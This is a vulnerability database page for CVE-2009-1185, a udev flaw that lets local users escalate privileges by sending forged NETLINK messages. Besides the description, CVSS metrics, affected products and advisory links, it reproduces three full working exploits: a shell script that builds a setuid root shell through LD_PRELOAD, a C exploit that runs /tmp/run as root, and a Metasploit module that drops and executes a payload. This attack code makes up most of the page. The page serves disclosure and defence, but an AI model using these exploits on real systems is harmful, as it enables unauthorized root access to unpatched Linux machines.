CVE-2009-1185 : Detail

CVE-2009-1185

A07-Identif. and Authent. Fail
0.06%V3
Local
2009-04-17
12h00 +00:00
2018-10-10
16h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

udev before 1.4.1 does not verify whether a NETLINK message originates from kernel space, which allows local users to gain privileges by sending a NETLINK message from user space.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-346 Origin Validation Error
The product does not properly verify that the source of data or communication is valid.

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 8478

Publication date : 2009-04-19 22h00 +00:00
Author : kingcope
EDB Verified : Yes

#!/bin/sh # Linux 2.6 # bug found by Sebastian Krahmer # # lame sploit using LD technique # by kcope in 2009 # tested on debian-etch,ubuntu,gentoo # do a 'cat /proc/net/netlink' # and set the first arg to this # script to the pid of the netlink socket # (the pid is udevd_pid - 1 most of the time) # + sploit has to be UNIX formatted text :) # + if it doesn't work the 1st time try more often # # WARNING: maybe needs some FIXUP to work flawlessly ## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang cat > udev.c << _EOF #include <fcntl.h> #include <stdio.h> #include <string.h> #include <stdlib.h> #include <unistd.h> #include <dirent.h> #include <sys/stat.h> #include <sysexits.h> #include <wait.h> #include <signal.h> #include <sys/socket.h> #include <linux/types.h> #include <linux/netlink.h> #ifndef NETLINK_KOBJECT_UEVENT #define NETLINK_KOBJECT_UEVENT 15 #endif #define SHORT_STRING 64 #define MEDIUM_STRING 128 #define BIG_STRING 256 #define LONG_STRING 1024 #define EXTRALONG_STRING 4096 #define TRUE 1 #define FALSE 0 int socket_fd; struct sockaddr_nl address; struct msghdr msg; struct iovec iovector; int sz = 64*1024; main(int argc, char **argv) { char sysfspath[SHORT_STRING]; char subsystem[SHORT_STRING]; char event[SHORT_STRING]; char major[SHORT_STRING]; char minor[SHORT_STRING]; sprintf(event, "add"); sprintf(subsystem, "block"); sprintf(sysfspath, "/dev/foo"); sprintf(major, "8"); sprintf(minor, "1"); memset(&address, 0, sizeof(address)); address.nl_family = AF_NETLINK; address.nl_pid = atoi(argv[1]); address.nl_groups = 0; msg.msg_name = (void*)&address; msg.msg_namelen = sizeof(address); msg.msg_iov = &iovector; msg.msg_iovlen = 1; socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT); bind(socket_fd, (struct sockaddr *) &address, sizeof(address)); char message[LONG_STRING]; char *mp; mp = message; mp += sprintf(mp, "%s@%s", event, sysfspath) +1; mp += sprintf(mp, "ACTION=%s", event) +1; mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1; mp += sprintf(mp, "MAJOR=%s", major) +1; mp += sprintf(mp, "MINOR=%s", minor) +1; mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1; mp += sprintf(mp, "LD_PRELOAD=/tmp/libno_ex.so.1.0") +1; iovector.iov_base = (void*)message; iovector.iov_len = (int)(mp-message); char *buf; int buflen; buf = (char *) &msg; buflen = (int)(mp-message); sendmsg(socket_fd, &msg, 0); close(socket_fd); sleep(10); execl("/tmp/suid", "suid", (void*)0); } _EOF gcc udev.c -o /tmp/udev cat > program.c << _EOF #include <unistd.h> #include <stdio.h> #include <sys/types.h> #include <stdlib.h> void _init() { setgid(0); setuid(0); unsetenv("LD_PRELOAD"); execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL); } _EOF gcc -o program.o -c program.c -fPIC gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles cat > suid.c << _EOF int main(void) { setgid(0); setuid(0); execl("/bin/sh","sh",0); } _EOF gcc -o /tmp/suid suid.c cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0 /tmp/udev $1 # milw0rm.com [2009-04-20]
Exploit Database EDB-ID : 8572

Publication date : 2009-04-29 22h00 +00:00
Author : Jon Oberheide
EDB Verified : Yes

/* * cve-2009-1185.c * * udev < 141 Local Privilege Escalation Exploit * Jon Oberheide <[email protected]> * http://jon.oberheide.org * * Information: * * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185 * * udev before 1.4.1 does not verify whether a NETLINK message originates * from kernel space, which allows local users to gain privileges by sending * a NETLINK message from user space. * * Notes: * * An alternate version of kcope's exploit. This exploit leverages the * 95-udev-late.rules functionality that is meant to run arbitrary commands * when a device is removed. A bit cleaner and reliable as long as your * distro ships that rule file. * * Tested on Gentoo, Intrepid, and Jaunty. * * Usage: * * Pass the PID of the udevd netlink socket (listed in /proc/net/netlink, * usually is the udevd PID minus 1) as argv[1]. * * The exploit will execute /tmp/run as root so throw whatever payload you * want in there. */ #include <stdio.h> #include <string.h> #include <stdlib.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/socket.h> #include <linux/types.h> #include <linux/netlink.h> #ifndef NETLINK_KOBJECT_UEVENT #define NETLINK_KOBJECT_UEVENT 15 #endif int main(int argc, char **argv) { int sock; char *mp, *err; char message[4096]; struct stat st; struct msghdr msg; struct iovec iovector; struct sockaddr_nl address; if (argc < 2) { err = "Pass the udevd netlink PID as an argument"; printf("[-] Error: %s\n", err); exit(1); } if ((stat("/etc/udev/rules.d/95-udev-late.rules", &st) == -1) && (stat("/lib/udev/rules.d/95-udev-late.rules", &st) == -1)) { err = "Required 95-udev-late.rules not found"; printf("[-] Error: %s\n", err); exit(1); } if (stat("/tmp/run", &st) == -1) { err = "/tmp/run does not exist, please create it"; printf("[-] Error: %s\n", err); exit(1); } system("chmod +x /tmp/run"); memset(&address, 0, sizeof(address)); address.nl_family = AF_NETLINK; address.nl_pid = atoi(argv[1]); address.nl_groups = 0; msg.msg_name = (void*)&address; msg.msg_namelen = sizeof(address); msg.msg_iov = &iovector; msg.msg_iovlen = 1; sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT); bind(sock, (struct sockaddr *) &address, sizeof(address)); mp = message; mp += sprintf(mp, "remove@/d") + 1; mp += sprintf(mp, "SUBSYSTEM=block") + 1; mp += sprintf(mp, "DEVPATH=/dev/foo") + 1; mp += sprintf(mp, "TIMEOUT=10") + 1; mp += sprintf(mp, "ACTION=remove") +1; mp += sprintf(mp, "REMOVE_CMD=/tmp/run") +1; iovector.iov_base = (void*)message; iovector.iov_len = (int)(mp-message); sendmsg(sock, &msg, 0); close(sock); return 0; } // milw0rm.com [2009-04-30]
Exploit Database EDB-ID : 21848

Publication date : 2012-10-09 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' require 'msf/core/post/common' require 'msf/core/post/file' require 'msf/core/post/linux/priv' require 'msf/core/exploit/local/linux_kernel' require 'msf/core/exploit/local/linux' require 'msf/core/exploit/local/unix' #load 'lib/msf/core/post/file.rb' #load 'lib/msf/core/exploit/local/unix.rb' #load 'lib/msf/core/exploit/local/linux.rb' #load 'lib/msf/core/exploit/local/linux_kernel.rb' class Metasploit4 < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::EXE include Msf::Post::File include Msf::Post::Common include Msf::Exploit::Local::LinuxKernel include Msf::Exploit::Local::Linux include Msf::Exploit::Local::Unix def initialize(info={}) super( update_info( info, { 'Name' => 'Linux udev Netlink Local Privilege Escalation', 'Description' => %q{ Versions of udev < 1.4.1 do not verify that netlink messages are coming from the kernel. This allows local users to gain privileges by sending netlink messages from userland. }, 'License' => MSF_LICENSE, 'Author' => [ 'kcope', # discovery 'Jon Oberheide', # 95-udev-late.rules technique 'egypt' # metasploit module ], 'Platform' => [ 'linux' ], 'Arch' => [ ARCH_X86 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'References' => [ [ 'CVE', '2009-1185' ], [ 'OSVDB', '53810' ], [ 'BID', '34536' ] ], 'Targets' => [ [ 'Linux x86', { 'Arch' => ARCH_X86 } ], [ 'Linux x64', { 'Arch' => ARCH_X86_64 } ], #[ 'Command payload', { 'Arch' => ARCH_CMD } ], ], 'DefaultOptons' => { 'WfsDelay' => 2 }, 'DefaultTarget' => 0, 'DisclosureDate' => "", } )) register_options([ OptString.new("WritableDir", [ true, "A directory where we can write files (must not be mounted noexec)", "/tmp" ]), OptInt.new("NetlinkPID", [ false, "Usually udevd pid-1. Meterpreter sessions will autodetect" ]), ], self.class) end def exploit if datastore["NetlinkPID"] and datastore["NetlinkPID"] != 0 netlink_pid = datastore["NetlinkPID"] else print_status("Attempting to autodetect netlink pid...") netlink_pid = autodetect_netlink_pid end if not netlink_pid print_error "Couldn't autodetect netlink PID, try specifying it manually." print_error "Look in /proc/net/netlink for a PID near that of the udevd process" return else print_good "Found netlink pid: #{netlink_pid}" end sc = Metasm::ELF.new(@cpu) sc.parse %Q| #define DEBUGGING #define NULL ((void*)0) #ifdef __ELF__ .section ".bss" rwx .section ".text" rwx .entrypoint #endif call main push eax call exit | # Set up the same include order as the bionic build system. # See external/source/meterpreter/source/bionic/libc/Jamfile cparser.lexer.include_search_path = [ "external/source/meterpreter/source/bionic/libc/include/", "external/source/meterpreter/source/bionic/libc/private/", "external/source/meterpreter/source/bionic/libc/bionic/", "external/source/meterpreter/source/bionic/libc/kernel/arch-x86/", "external/source/meterpreter/source/bionic/libc/kernel/common/", "external/source/meterpreter/source/bionic/libc/arch-x86/include/", ] cparser.parse(%Q| #define DEBUGGING // Fixes a parse error in bionic's libc/kernel/arch-x86/asm/types.h #ifndef __extension__ #define __extension__ #endif // Fixes a parse error in bionic's libc/include/sys/cdefs_elf.h // Doing #if on an undefined macro is fine in GCC, but a parse error in // metasm. #ifndef __STDC__ #define __STDC__ 0 #endif #include <sys/types.h> #include <stdarg.h> #include <stdio.h> #include <unistd.h> #include <errno.h> |) [ "external/source/meterpreter/source/bionic/libc/bionic/__errno.c", "external/source/meterpreter/source/bionic/libc/bionic/__set_errno.c", "external/source/meterpreter/source/bionic/libc/stdio/stdio.c", ].each do |fname| cparser.parse(File.read(fname), fname) end payload_path = "#{datastore["WritableDir"]}/#{Rex::Text.rand_text_alpha(10)}" evil_path = "#{datastore["WritableDir"]}/#{Rex::Text.rand_text_alpha(10)}" unix_socket_h(sc) linux_x86_syscall_wrappers(sc) main = %Q^ #include <string.h> #include <linux/netlink.h> #define NULL 0 int main() { int sock; struct iovec iov; struct sockaddr_nl sa; struct msghdr msg; char *mp; char message[4096]; memset(sa, 0, sizeof(sa)); sa.nl_family = AF_NETLINK; sa.nl_pid = #{netlink_pid}; sa.nl_groups = 0; memset(&msg, 0x00, sizeof(struct msghdr)); msg.msg_name = (void *)&sa; msg.msg_namelen = sizeof(sa); msg.msg_iov = &iov; msg.msg_iovlen = 1; msg.msg_control = NULL; msg.msg_controllen = 0; msg.msg_flags = 0; sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT); bind(sock, (struct sockaddr *) &sa, sizeof(sa)); mp = message; mp += sprintf(mp, "remove@/d") + 1; mp += sprintf(mp, "SUBSYSTEM=block") + 1; mp += sprintf(mp, "DEVPATH=/dev/#{Rex::Text.rand_text_alpha(10)}") + 1; mp += sprintf(mp, "TIMEOUT=10") + 1; mp += sprintf(mp, "ACTION=remove") +1; mp += sprintf(mp, "REMOVE_CMD=#{payload_path}") +1; iov.iov_base = (void*)message; iov.iov_len = (int)(mp-message); sendmsg(sock, &msg, 0); close(sock); return 0; } ^ cparser.parse(main, "main.c") asm = cpu.new_ccompiler(cparser, sc).compile sc.parse asm sc.assemble begin elf = sc.encode_string rescue print_error "Metasm Encoding failed: #{$!}" elog "Metasm Encoding failed: #{$!.class} : #{$!}" elog "Call stack:\n#{$!.backtrace.join("\n")}" return end pl = payload.encoded_exe print_status "Writing payload executable (#{pl.length} bytes) to #{payload_path}" write_file(payload_path, pl) print_status "Writing exploit executable (#{elf.length} bytes) to #{evil_path}" write_file(evil_path, elf) print_status "chmod'ing and running it..." cmd_exec("chmod 755 #{evil_path} #{payload_path}") cmd_exec("#{evil_path}") rm_f(evil_path, payload_path) end def autodetect_netlink_pid netlink_pid = nil case session.type when "meterpreter" print_status("Meterpreter session, using get_processes to find netlink pid") process_list = session.sys.process.get_processes udev_proc = process_list.find {|p| p["name"] =~ /udevd/ } udev_pid = udev_proc["pid"] print_status "udev pid: #{udev_pid}" netlink = read_file("/proc/net/netlink") netlink.each_line do |line| pid = line.split(/\s+/)[2].to_i if pid == udev_pid - 1 netlink_pid = pid break end end else print_status("Shell session, trying sh script to find netlink pid") netlink_pid = cmd_exec( %q^ for netlink_pid in $(awk '{print $3}' /proc/net/netlink |sort -u|grep -v -- -); do for udev_pid in $(ps aux | grep [u]devd | awk '{print $2}'); do [ $(( $udev_pid-1 )) = $netlink_pid ] && echo $netlink_pid ; done; done ^) netlink_pid = nil if netlink_pid.empty? end netlink_pid end end

Products Mentioned

Configuraton 0

Udev_project>>Udev >> Version To (excluding) 141

Configuraton 0

Suse>>Linux_enterprise_debuginfo >> Version 10

Suse>>Linux_enterprise_debuginfo >> Version 11

Opensuse>>Opensuse >> Version 10.3

Opensuse>>Opensuse >> Version 11.0

Opensuse>>Opensuse >> Version 11.1

Suse>>Linux_enterprise_desktop >> Version 10

Suse>>Linux_enterprise_desktop >> Version 11

Suse>>Linux_enterprise_server >> Version 10

Suse>>Linux_enterprise_server >> Version 11

Configuraton 0

Debian>>Debian_linux >> Version 4.0

Debian>>Debian_linux >> Version 5.0

Configuraton 0

Canonical>>Ubuntu_linux >> Version 6.06

Canonical>>Ubuntu_linux >> Version 7.10

Canonical>>Ubuntu_linux >> Version 8.04

Canonical>>Ubuntu_linux >> Version 8.10

Configuraton 0

Fedoraproject>>Fedora >> Version 9

Fedoraproject>>Fedora >> Version 10

Configuraton 0

Juniper>>Ctpview >> Version To (excluding) 7.1

Juniper>>Ctpview >> Version 7.1

Juniper>>Ctpview >> Version 7.1

Juniper>>Ctpview >> Version 7.2

References

http://secunia.com/advisories/34801
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/35766
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.mandriva.com/security/advisories?name=MDVSA-2009:104
Tags : vendor-advisory, x_refsource_MANDRIVA
http://www.debian.org/security/2009/dsa-1772
Tags : vendor-advisory, x_refsource_DEBIAN
http://www.gentoo.org/security/en/glsa/glsa-200904-18.xml
Tags : vendor-advisory, x_refsource_GENTOO
http://www.vupen.com/english/advisories/2009/1865
Tags : vdb-entry, x_refsource_VUPEN
http://www.securityfocus.com/bid/34536
Tags : vdb-entry, x_refsource_BID
http://www.securitytracker.com/id?1022067
Tags : vdb-entry, x_refsource_SECTRACK
http://www.redhat.com/support/errata/RHSA-2009-0427.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.mandriva.com/security/advisories?name=MDVSA-2009:103
Tags : vendor-advisory, x_refsource_MANDRIVA
http://secunia.com/advisories/34776
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/34731
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/34753
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/34785
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/34787
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2009/1053
Tags : vdb-entry, x_refsource_VUPEN
http://www.ubuntu.com/usn/usn-758-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://secunia.com/advisories/34771
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/34750
Tags : third-party-advisory, x_refsource_SECUNIA
https://www.exploit-db.com/exploits/8572
Tags : exploit, x_refsource_EXPLOIT-DB